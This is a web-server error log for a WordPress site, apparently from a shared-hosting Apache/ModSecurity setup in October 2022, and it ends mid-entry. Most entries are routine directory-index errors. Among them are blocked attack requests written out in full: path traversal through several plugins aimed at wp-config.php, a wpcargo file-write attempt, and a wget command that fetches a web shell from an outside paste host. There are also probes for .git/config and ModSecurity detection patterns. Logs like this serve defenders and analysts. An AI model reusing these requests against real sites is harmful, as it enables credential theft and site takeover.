investigacionperu.com [Wed Oct 12 04:37:37.436405 2022] [autoindex:error] [pid 722:tid 139695199180544] [client 34.247.208.201:54316] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:38:49.557919 2022] [autoindex:error] [pid 1455:tid 139695052797696] [client 151.80.67.229:54422] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:39:21.300750 2022] [autoindex:error] [pid 1455:tid 139695190787840] [client 151.80.67.229:54520] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:40:05.404291 2022] [autoindex:error] [pid 1455:tid 139694952085248] [client 151.80.67.229:54612] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/Transport/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Oct 12 04:40:35.178797 2022] [autoindex:error] [pid 722:tid 139694960477952] [client 198.57.224.71:54622] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentytwenty/classes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com 2022/10/12 11:54:51 [error] 570#570: *469779 access forbidden by rule, client: 54.219.62.223, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/10/12 11:54:55 [error] 574#574: *469787 access forbidden by rule, client: 54.219.62.223, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/12 11:55:00 [error] 574#574: *469799 access forbidden by rule, client: 54.219.62.223, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed Oct 12 13:53:36.506956 2022] [autoindex:error] [pid 724:tid 139694994048768] [client 20.55.114.34:42680] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Oct 12 15:03:55.179094 2022] [:error] [pid 724:tid 139694985656064] [client 137.184.83.255:44566] [client 137.184.83.255] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Y0cdq28QZiI46RDYMk8uRgAAAJM"], referer: https://www.google.com [Wed Oct 12 15:03:56.683990 2022] [:error] [pid 724:tid 139695010834176] [client 137.184.83.255:44568] [client 137.184.83.255] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y0cdrG8QZiI46RDYMk8uRwAAAJA"], referer: https://www.google.com [Wed Oct 12 15:03:58.028181 2022] [:error] [pid 722:tid 139695207573248] [client 137.184.83.255:44570] [client 137.184.83.255] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y0cdrnenQf-DMAD_r3kBJQAAAAE"], referer: https://www.google.com [Wed Oct 12 15:03:59.370605 2022] [:error] [pid 722:tid 139695190787840] [client 137.184.83.255:44572] [client 137.184.83.255] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "Y0cdr3enQf-DMAD_r3kBJgAAAAM"], referer: https://www.google.com [Wed Oct 12 15:04:00.696943 2022] [:error] [pid 722:tid 139695086368512] [client 137.184.83.255:44574] [client 137.184.83.255] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "Y0cdsHenQf-DMAD_r3kBJwAAAAc"], referer: https://www.google.com [Wed Oct 12 18:35:07.326541 2022] [autoindex:error] [pid 724:tid 139695165609728] [client 85.215.119.178:50686] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Oct 14 01:54:26.935886 2022] [autoindex:error] [pid 16436:tid 139885683869440] [client 20.254.141.16:42974] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Fri Oct 14 05:52:11.691973 2022] [:error] [pid 23911:tid 140185685702400] [client 5.188.62.174:47536] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y0k_W_8PbzBlRGY8hLWMuAAAAMQ"] [Fri Oct 14 06:38:05.033880 2022] [:error] [pid 23409:tid 140185643738880] [client 51.11.142.118:48490] [client 51.11.142.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y0lKHVDpOrOqQCZxjyuSKAAAAAk"], referer: www.google.com [Fri Oct 14 06:38:08.556062 2022] [:error] [pid 23409:tid 140185702487808] [client 51.11.142.118:48496] [client 51.11.142.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y0lKIFDpOrOqQCZxjyuSKQAAAAI"], referer: www.google.com [Fri Oct 14 19:33:36.812653 2022] [autoindex:error] [pid 23411:tid 140185660524288] [client 85.215.119.178:40344] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:33:41.023342 2022] [autoindex:error] [pid 23411:tid 140185685702400] [client 85.215.119.178:40346] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:33:44.977031 2022] [autoindex:error] [pid 23411:tid 140185668916992] [client 85.215.119.178:40348] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:33:47.967034 2022] [autoindex:error] [pid 23911:tid 140185719273216] [client 85.215.119.178:40350] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:33:52.111662 2022] [autoindex:error] [pid 23911:tid 140185660524288] [client 85.215.119.178:40352] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:33:56.135022 2022] [autoindex:error] [pid 23911:tid 140185668916992] [client 85.215.119.178:40354] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:34:02.044111 2022] [autoindex:error] [pid 23409:tid 140185517848320] [client 85.215.119.178:40356] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:34:05.911805 2022] [autoindex:error] [pid 23911:tid 140185643738880] [client 85.215.119.178:40358] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:39:00.344613 2022] [autoindex:error] [pid 23911:tid 140185601775360] [client 85.215.119.178:40448] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:39:04.119224 2022] [:error] [pid 23911:tid 140185526241024] [client 85.215.119.178:40450] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Oct 14 19:39:04.119514 2022] [:error] [pid 23911:tid 140185526241024] [client 85.215.119.178:40450] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Oct 14 19:39:04.119718 2022] [:error] [pid 23911:tid 140185526241024] [client 85.215.119.178:40450] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Oct 14 19:39:04.119924 2022] [:error] [pid 23911:tid 140185526241024] [client 85.215.119.178:40450] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Fri Oct 14 19:39:09.625385 2022] [autoindex:error] [pid 23911:tid 140185652131584] [client 85.215.119.178:40452] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:39:14.348049 2022] [autoindex:error] [pid 23411:tid 140185543026432] [client 85.215.119.178:40454] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:39:19.203263 2022] [autoindex:error] [pid 23411:tid 140185618560768] [client 85.215.119.178:40456] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:39:24.863137 2022] [autoindex:error] [pid 23911:tid 140185543026432] [client 85.215.119.178:40458] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 19:39:29.166550 2022] [autoindex:error] [pid 23411:tid 140185694095104] [client 85.215.119.178:40468] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2022/10/14 19:42:53 [error] 23269#23269: *522585 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 85.215.119.178, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Fri Oct 14 19:48:59.111423 2022] [autoindex:error] [pid 23911:tid 140185593382656] [client 85.215.119.178:40662] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 20:06:28.174558 2022] [autoindex:error] [pid 23410:tid 140185694095104] [client 85.215.119.178:40988] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 20:06:31.515622 2022] [autoindex:error] [pid 23911:tid 140185517848320] [client 85.215.119.178:40990] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 20:06:35.808594 2022] [autoindex:error] [pid 23911:tid 140185610168064] [client 85.215.119.178:40992] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 20:06:39.728808 2022] [autoindex:error] [pid 23911:tid 140185626953472] [client 85.215.119.178:40994] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 20:06:43.127429 2022] [autoindex:error] [pid 23911:tid 140185660524288] [client 85.215.119.178:40996] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 20:06:47.069002 2022] [autoindex:error] [pid 23411:tid 140185626953472] [client 85.215.119.178:40998] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 20:06:49.854232 2022] [autoindex:error] [pid 23410:tid 140185559811840] [client 85.215.119.178:41000] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 20:09:57.726525 2022] [autoindex:error] [pid 23911:tid 140185593382656] [client 85.215.119.178:41098] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 14 20:10:50.471000 2022] [autoindex:error] [pid 23911:tid 140185668916992] [client 85.215.119.178:41118] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2022/10/15 07:14:10 [error] 24297#24297: *532519 access forbidden by rule, client: 3.71.108.20, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Oct 15 07:30:07.915823 2022] [:error] [pid 24435:tid 140003854251776] [client 173.252.95.116:56740] [client 173.252.95.116] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-524287"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y0qnz9zbHINV8_Ys2osf5wAAAEM"] [Sat Oct 15 20:02:18.791189 2022] [autoindex:error] [pid 25047:tid 140003728361216] [client 20.167.56.75:50282] AH01276: Cannot serve directory 